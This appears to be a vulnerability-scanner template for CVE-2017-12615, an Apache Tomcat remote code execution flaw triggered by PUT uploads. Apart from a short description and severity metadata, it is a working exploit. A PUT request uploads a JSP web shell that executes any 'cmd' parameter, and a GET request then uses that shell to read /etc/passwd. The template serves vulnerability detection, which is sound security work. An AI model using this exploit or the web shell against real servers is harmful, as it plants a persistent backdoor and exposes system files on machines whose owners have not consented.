id: CVE-2017-12615

info:
  name: Apache Tomcat RCE
  author: pikpikcu
  severity: high
  tags: cve,cve2017,apache,rce,tomcat
  reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
  description: |
    By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
    This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
    However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
    Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.10
    cve-id: CVE-2017-12615
    cwe-id: CWE-434

requests:
  - method: PUT
    path:
      - "{{BaseURL}}/poc.jsp/"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      <%@ page import="java.util.*,java.io.*"%>
      <%
      if (request.getParameter("cmd") != null) {
              out.println("Command: " + request.getParameter("cmd") + "<BR>");
              Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
              OutputStream os = p.getOutputStream();
              InputStream in = p.getInputStream();
              DataInputStream dis = new DataInputStream(in);
              String disr = dis.readLine();
              while ( disr != null ) {
                      out.println(disr);
                      disr = dis.readLine();
                      }
              }
      %>

  - method: GET
    path:
      - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200